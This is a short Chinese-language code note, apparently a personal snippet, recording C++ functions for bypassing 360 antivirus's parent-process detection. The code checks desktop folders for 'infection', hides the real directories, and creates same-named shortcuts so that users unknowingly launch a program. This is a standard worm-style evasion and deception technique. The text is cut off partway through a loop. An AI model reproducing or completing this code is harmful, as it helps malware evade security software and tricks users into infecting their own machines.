利用快捷方式,由用户启动程序,进行绕过360父进程查杀,代码记录于此处,方便查阅
int bypass_360_startup()
{
TCHAR str_desktop[256];
LPITEMIDLIST pidl;
SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl);//place the shortcut on the desktop
SHGetPathFromIDList(pidl, str_desktop);
if (if_need_infection(str_desktop)==0)//是否需要感染
{
OutputDebugStringA("bypass_360_startup if_need_infection return");
return 0;
}
if (set_hide_directory(str_desktop)==0)//设置目录为隐藏属性
{
OutputDebugStringA("bypass_360_startup set_hide_directory return");
return 0;
}
if (create_link(str_desktop)==0)//创建同名的快捷方式
{
OutputDebugStringA("bypass_360_startup create_link return");
return 0;
}
return 0;
}
int if_need_infection(TCHAR str_disk[])
{
OutputDebugStringA("if_need_infection fun:");
CSearchFile file;
file.SearchFile(_T("."),str_disk);
for (DWORD i=0;i<fil